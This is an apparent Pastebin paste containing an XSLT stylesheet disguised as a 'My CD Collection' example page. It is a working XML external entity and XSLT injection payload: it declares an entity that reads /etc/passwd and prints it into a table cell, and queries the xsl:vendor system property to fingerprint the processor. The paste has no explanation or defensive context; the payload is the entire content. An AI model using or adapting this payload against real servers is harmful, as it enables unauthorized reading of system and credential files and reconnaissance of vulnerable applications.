Advertisement
Guest User

Untitled

a guest
Mar 25th, 2019
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE xls:stylesheet [
  3. <!ENTITY passwd SYSTEM "file:///etc/passwd" >]>
  4. <xsl:stylesheet version="1.0"
  5. xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  6. <xsl:template match="/">
  7. <html>
  8. <body>
  9. <h2>My CD Collection</h2>
  10. <table border="1">
  11. <tr bgcolor="#9acd32">
  12. <th>Title</th>
  13. <th>Artist</th>
  14. </tr>
  15. <tr>
  16. <td>&passwd;</td>
  17. <td><xsl:value-of select="system-property('xsl:vendor')"/></td>
  18. </tr>
  19. </table>
  20. </body>
  21. </html>
  22. </xsl:template>
  23. </xsl:stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement